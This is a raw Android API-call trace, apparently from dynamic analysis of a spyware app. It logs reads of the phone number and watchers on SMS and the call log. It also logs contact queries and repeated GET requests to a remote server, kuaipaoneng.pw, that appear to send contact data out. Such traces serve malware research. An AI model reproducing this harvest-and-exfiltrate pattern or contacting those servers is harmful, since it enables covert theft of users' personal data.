D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 5844): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/conmunk.onefivee.sofdnads-1/base.apk]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads]
D/S4URC   ( 5844): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/cache]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/cache]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 5844): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://sms/]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.SCREEN_OFF,android.intent.action.SCREEN_ON,
D/S4URC   ( 5844): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://call_log/calls]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml.bak]
D/S4URC   ( 5844): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml.bak]
D/S4URC   ( 5844): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][tmp] [Value][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][contact] [Return][false]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$MD5]
D/S4URC   ( 5844): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/raw_contacts]
D/S4URC   ( 5844): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/data]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 5844): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/d0d417a9215900cb5789ababc45685e7.php?type=contect]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/d0d417a9215900cb5789ababc45685e7.php?type=contect]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/47015b7d26abdc0b7632d42f67c1122d.php]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/47015b7d26abdc0b7632d42f67c1122d.php]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/d1baaac7f59640efacc4da5745ebf586.php]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/d1baaac7f59640efacc4da5745ebf586.php]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/ab677837c73724b215040ae5e5e9b0ac.php]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/ab677837c73724b215040ae5e5e9b0ac.php]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][contact] [Return][false]
D/S4URC   ( 5844): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/raw_contacts]
D/S4URC   ( 5844): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/data]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/cfcd2df3288af5ba61ba3024a94a4b03.php?type=contect]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/cfcd2df3288af5ba61ba3024a94a4b03.php?type=contect]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/295acd26e75c5b8e554023d3a34012de.php]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/295acd26e75c5b8e554023d3a34012de.php]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/675a19558edbd093b68aa0dc608eb210.php]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/675a19558edbd093b68aa0dc608eb210.php]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][contact] [Return][false]
D/S4URC   ( 5844): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/raw_contacts]
D/S4URC   ( 5844): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/data]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/10a6fb4c34310a370d4d6fbb2cb17666.php?type=contect]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/10a6fb4c34310a370d4d6fbb2cb17666.php?type=contect]
D/S4URC   ( 5844): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5844): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5844): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/0aa31a31524ee54bb664810bd0949ad9.php]
D/S4URC   ( 5844): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/0aa31a31524ee54bb664810bd0949ad9.php]
